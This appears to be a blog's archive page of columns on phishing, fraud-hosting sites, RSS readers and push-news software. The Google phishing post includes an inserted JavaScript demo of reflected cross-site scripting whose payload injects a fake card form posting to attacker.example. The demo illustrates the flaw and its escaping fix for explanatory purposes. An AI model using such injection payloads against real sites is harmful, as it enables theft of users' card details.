Tag Archives: Website

Phishing Toolbars — The One That Works

Last week I wrote in my WSJ.com/AWSJ column (sub required) about the cross site scripting phish I received a few weeks ago (it appeared late because of the Easter holiday). The point I made in the column is that most of the browser toolbars designed to prevent phishing failed to warn the user of the attack.

Some readers have asked which toolbars didn’t work. I didn’t have space in the column to list them, but I did mention that one worked: Netcraft’s Anti-phishing Toolbar. Sadly it only works with IE, but since most banking sites still insist on only functioning in that browser, this is not too much of a handicap. Netcraft are actually an interesting, serious bunch of people who do good work, not least their DNS search engine. (They also measure server traffic, and pointed a few days back to a burst in visits to the Vatican’s website as the Pope lay on his deathbed.)

Anyway, next posting I plan to list the toolbars that didn’t work on the Charterone phish.

Phishing Your Yahoo! Account

More evidence that phishers are widening their net. Munir Kotadia of ZDNet Australia reports that Yahoo’s free instant-messaging (IM) service is being targeted by phishers in an attempt to steal usernames, passwords and other personal information.

Yahoo confirmed on Thursday its service was being targeted by a phishing scam. According to the search giant, attackers are sending members a message containing a link to a fake Web site that looks like an official Yahoo site and asks the user to log in by entering their Yahoo ID and password.

The scam is convincing because the original message seems to arrive from someone on the victim’s friends list. Should the recipient of the phishing message enter their details, the attackers can gain access to any personal information stored in their profile and more importantly, the victim’s contact lists.

The bigger point about this is that any kind of password may be enough for the phisher. With Yahoo! the successful phisher may be able to get quite a lot of personal data for a future social engineering attack, and may even be able to access payment details such as addresses from within the profile. A phisher could also access the user’s PayPal account, redirect shipments, learn about the user’s investments, impersonate the user in auctions, and so on. I’m not sure whether the phisher could access credit card details, but it’s feasible, I guess.

Bloglines Goes International

The folks at Bloglines, a very popular web-based RSS reader and publisher, will today launch an international version with support for six languages, which they hope “may mark a shift in the expansion of blog/RSS reach and usage, heading down the global internet service road paved by eBay and Amazon, etc.”

The new internationalized web site, due to go live later today, offers the service in Chinese, French, German, Japanese, Portuguese and Spanish. Bloglines reckons it “is the first RSS service to embrace consumers in multiple languages”. The internationalization includes the home page, navigation screens, and all the help menus and user tips.

How To Phish Google

I’ve long believed that phishing emails are just the beginning of a new kind of fraud which is likely to be sophisticated and fast moving. Here’s an example of what they might look like, courtesy of a British computer scientist called Jim Ley, written up at the security website Netcraft. Ley, Netcraft says, “has demonstrated that opportunities exist for fraudsters to launch phishing attacks using cross site scripting bugs on the very widely used Google sites.”

I’m not quite clear from either account whether this is one vulnerability or more, and whether it applies only since Google extended their desktop search to include files on your computer (rather than on the Internet).

As far as I can figure it out, it works like this. A bad guy, rather than try to lure a victim to his dodgy website using a socially engineered email or a virus, would ‘inject’ content into Google to do the same thing. So, say, a user would visit Google to find a credit card submission form which explains that Google is soon to become a subscription-only service at $5 per month, but that users could take advantage of an earlybird special offer to obtain lifetime free searches for just $10. (This is Ley’s example, cited by Netcraft.)
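To make the mechanism concrete, here is an added example. It is not code from this post, from Netcraft, from Ley or from Google, and it does not reproduce the actual Google bug; it is a toy version of the class of hole both the Charterone phish and Ley’s demonstration rely on, a reflected cross site scripting flaw. A results page echoes the search query into its HTML without escaping it, so a crafted link can carry a fake payment form that then appears at the trusted site’s own address. Because the address really is the trusted site, a toolbar that only asks “is this hostname on my trusted list?” waves the page through, which is one plausible reason so many toolbars missed the Charterone phish. The hostname, the attacker URL, the payload text and the hardened rendering function are all constructed for illustration.

```javascript
// Added example (not from the original post, not Google's actual bug): a toy
// search page that reflects the query into its HTML, once unescaped and once
// escaped, plus the naive hostname check an anti-phishing toolbar might do.

// Constructed, hypothetical "trusted" site.
const TRUSTED_HOSTS = new Set(["search.example.com"]);

// Minimal HTML escaping suitable for text nodes and double-quoted attributes.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable: the query is concatenated straight into the page markup.
function renderResultsUnsafe(query) {
  return `<h2>Results for: ${query}</h2>`;
}

// Hardened: the query is escaped before it reaches the markup, so any tags
// in it are shown as literal text rather than interpreted by the browser.
function renderResultsSafe(query) {
  return `<h2>Results for: ${escapeHtml(query)}</h2>`;
}

// Naive toolbar check: trust the page if its hostname is on the list.
// An XSS payload lives on the trusted host, so this check passes it.
function toolbarAllows(url) {
  return TRUSTED_HOSTS.has(new URL(url).hostname);
}

// Detection helper for the demo: does the rendered page contain a form
// element the site itself never wrote?
function containsInjectedForm(html) {
  return /<form\b/i.test(html);
}

// Constructed payload in the spirit of Ley's example: a fake "lifetime free
// searches for $10" card form dropped into the results page. It closes the
// heading, inserts the form, and reopens a heading so the page stays tidy.
const PAYLOAD =
  '</h2><form action="https://attacker.example/collect" method="post">' +
  "<p>Search will soon cost $5/month. Early-bird offer: lifetime free searches for $10.</p>" +
  '<input name="card" placeholder="Card number"><button>Pay $10</button></form><h2>';

// Build the phishing link, let the toy site parse it the way a server would,
// and report what the toolbar and each rendering path do with it.
function demo() {
  const url =
    "https://search.example.com/search?q=" + encodeURIComponent(PAYLOAD);
  const query = new URL(url).searchParams.get("q");
  return {
    toolbarAllows: toolbarAllows(url),                          // true
    unsafeHasForm: containsInjectedForm(renderResultsUnsafe(query)), // true
    safeHasForm: containsInjectedForm(renderResultsSafe(query)),     // false
  };
}

console.log(demo());
```

Run it with `node`; `URL` is a global in Node.js. The lesson is in the three booleans: the hostname check is satisfied because the page genuinely comes from the trusted site, the unescaped render contains the attacker’s form, and the only thing that actually stops the attack is the site escaping what it reflects.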

Another vulnerability included in the Google Desktop would, Netcraft says, have “allowed an attacker to search a user’s local machine for passwords and report the results directly back to the attacker’s own web site.” Both vulnerabilities have been fixed, but Netcraft and Ley say incompletely.

I don’t claim to understand the technical aspects of this, and it may be somewhat obscure. But what is worrying is that (a) Ley reports Google as being less than interested in addressing the issues he raised (two years ago, according to his website) and, (b) that if such tricks are occurring to diligent folk like Ley, they must be occurring to hackers and the Internet underground. I’ve said it before, and I’ll say it again: Phishing is not just misleading emails, it’s a multifaceted effort to part us ordinary folk from our online money. And it’s not going to go away. Indeed, like most things technological, it’s a fast escalating arms race, and I don’t think we’ve even started to get it figured out.

Are Blogs The Future Of Web Design?

Have blogs changed our idea of what constitutes a well-designed webpage?

I was reading Wired’s interesting piece on guerrilla webpage redesign, where disgruntled folk take the content of a badly designed website and make their own mirror, throwing out the Javascript, cookies, confusing menus, bugs, excessive art-junk for a slimmed down, simplified imitation on their own server.

While the piece talks about the trouble these folk go to, and the trouble they land up in, I couldn’t help noticing that David Jones’s excellent makeover of Wales’ National Assembly website is basically a blog. Everything is there from the original, but it’s all a lot easier to navigate and much easier on the eye. But it looks, feels and walks like a blog.

Are blogs turning the huge ship that is the World Wide Web back to its roots, where webpages were less about glitz and more about content, where simplicity and usability counted for more than multimedia interactivity and gee-whiz mouseovers? Or not? Or did it all happen a long time ago and I only just notice?

Fraud For Sale

Online fraud and other forms of Internet crime are a business, openly sold over the Internet.

British-based Internet security company Netcraft says they’re receiving spam advertising dozens of “fraud hosting” websites that offer services and gather together those interested in such pursuits. Unsurprisingly, perhaps, most are Russian. But not all.

Carderportal.com resolves to Netfirms, a hosting service based in Toronto. Netcraft says carder.org “was also hosted in North America” but has since had its record removed.

What’s interesting, apparently, is how brazenly mainstream companies are hosting these sites. Nethouse in St. Petersburg “houses stalk.ru, majordomo.ru and mazafaka.ru. Nethouse, which brands its hosting unit as Majordomo.ru, is housed within the data center of Runnet, the third-largest Russian hosting provider with 11.5K hostnames,” Netcraft says.

Not all are active. One, MaZaFaKa.Ru (unless I’m much mistaken, saying it out loud gives a good idea of the reason behind the name; the website’s motto is ‘Network Terrorism’ and its copyright text is, er, nonstandard), offers everything from cracks (usually code that has broken past the anti-piracy controls on software) to scripts, viruses and other nasties. It also lists the ‘last hacked sites’ — presumably websites that its members have managed to break into — many of which are Russian. (The message left on the hacked sites is anti-US involvement in Iraq.) It even contains the original Netcraft posting on its site. Unfortunately I’m not a Russian speaker so I can’t explore more.

Agava Software Network in Moscow, Netcraft says, hosted the “Russian Carder Clan” site at carderclan.net (195.161.118.168), which ran on a shared server at Agava.net. The site has recently been taken offline, as has Carderportal.org (81.176.64.102) at epolis.ru, which also resided at Agava. Agava “specializes in the offshore custom software development and provides the off-site consulting, development, and testing services”, and lists among its projects WebCelerator, software to speed up surfing.

Here’s a list of the domains advertised, according to Netcraft: carder.org, carderclan.net, carderportal.com, carderportal.org, the cc.ru, mazafaka.ru, lncrew.com, majordomo.ru and agava.com. Register at one of them and you can expect to be offered “Spam Hosting – from 20$ per mounth, Fraud Hosting – from 30$ per mounth, Stolen Credit Cards, Fake ID, DL’s, Spam For free (with a limited time period)”.

Here’s another one that Netcraft didn’t mention: Asechka.ru, which has recently sent spam advertising its ‘fraud and carders site’: “On our site and board you are find: Bulk, Spam and Fraud Hosting, Stolen Credit Cards for Sale, Stolen Dumps of cardholder’s for Sale, Children Porno, Sex, Erotic films…. WE ACCEPT: Western Union, WebMoney, E-GOLD.”

I’m seeking comment from some of these sites.

News: Another way to get your fix

Another way of getting news

I’ve talked ad nauseam about RSS feeds — a method of getting you snippets of news and whatnot but not clogging your inbox, or exposing you to more spam — but if you find it all a bit fiddly, you might want to try this option. ToolButton Inc. this week released version 1.2 of ToolButton, an Internet Explorer browser enhancement “that provides users with a delivery channel to obtain content from their favorite websites without the worry and bother of spam.”

Basically, the ToolButton is a toolbar that appears in your browser, offering buttons to dynamic content (it changes when new news comes in) and static content (it doesn’t) from websites you choose. A website’s ToolButton can include news content, dynamic feeds, blogs, RSS content and menus of important URLs.

I’ve installed it and like it. What I haven’t checked out is whether it’s monitoring your browsing activities. More on that once I find out, and hear back from the ToolButton folk.

Column: Klips

Loose Wire: When Push Comes to Shove

By Jeremy Wagstaff
from the 25 April 2002 edition of the Far Eastern Economic Review, (c) 2003, Dow Jones & Company, Inc.

I think I can safely say it, though others have been saying it for years: Push is dead. In which case I’d like to be the first to say: Long live push.

For those of you who weren’t following closely, push was much hyped in the mid-1990s when computers were first being hooked up to the Internet in a big way. The idea was simple enough: instead of users going to Web sites to get information — pull — the information could be sent — pushed — to the user. You could then sit back and watch it all — cricket scores, share prices, headlines — scroll across your screen. For the corporate world it was an opportunity to also push ads, special offers and branding.

So what went wrong? First out of the starting gate, PointCast earned lasting opprobrium because its software hogged computer and Internet resources. PointCast retired hurt, and was eventually bought by EntryPoint in 1999, which a year later merged with Internet Financial Network Inc. to form InfoGate. InfoGate stopped offering its free ticker in mid-April, and its technology can now only be found behind the subscription-based USA Today NewsTracker ($40 a year from newstracker.usatoday.com), which somewhat fittingly looks like the PointCast of old.

Actually, it’s not push that is dead. It’s the gravity-defying business models and catch-all products that don’t offer anything other people can’t offer for free. InfoGate fell by the wayside because it didn’t make any money. USA Today’s NewsTracker won’t, in my view, attract users because you can get the same thing free elsewhere — try the BBC’s excellent Newsline ticker (www.bbc.co.uk/newsline).

Why then has yet another scrolling-ticker business thrown open its doors to the public in the same week as InfoGate closed them? Enter KlipFolio from Serence, a small Windows program that at first blush is not much different. The scrolling is familiar; the clicking on a headline to see the full story is the same. The only visible change is that each Klip contains information from one source only, so instead of one big scrolling ticker with everything in it, from CNN to your local rag, Klips are small and independent.

Below stairs, it’s very different: a content-service provider (what you and I would call a Web site, whether it’s a magazine, news service, an auction site or whatever) adds some lines of Klip computer code so that every time they add some data to their Web site (a news story, an updated stock price, a new item for sale) that data is added to the Klip’s scrolling headlines.

Users, meanwhile, select which Klips they want to view on their screen, which will then update in real time with the new story, price or item for sale. Simple. Serence operates merely as the provider of technology to the content-service providers. For the user, the Klip software is free (www.Klipfolio.com), though Serence says some providers may charge for content in the future.

So what’s so different about this? Well, first off the software looks and works beautifully. Secondly, the back end is simple enough for content-service providers to be able to incorporate it without any extra computers, technicians or PhDs. This means that Serence is just an intermediary; it just provides a site where users can find what sources are available, and it licenses the software to the providers.

Where I believe Klips might really take off, however, is in delivering more specialized content. Sure, we can monitor Web sites, get stuff by e-mail, even have stock prices sent to our mobile phone, but imagine having a Klip that monitors, say, the prices of fast-moving items on an on-line auction site, or jobs in a particular industry.

What’s more, Serence has priced the product so that even individuals who produce specialist newsletters can jump aboard for about $100 a month. Indeed, as Blogs — Web sites that collate niche news and analysis — become more organized, Klips may emerge as a great way for individuals to provide a valuable real-time service which grateful users may pay for.

If that happens, it may well mark the coming of age of push: an information-delivery service that gives me stuff I need, doesn’t take up space and doesn’t go out of business.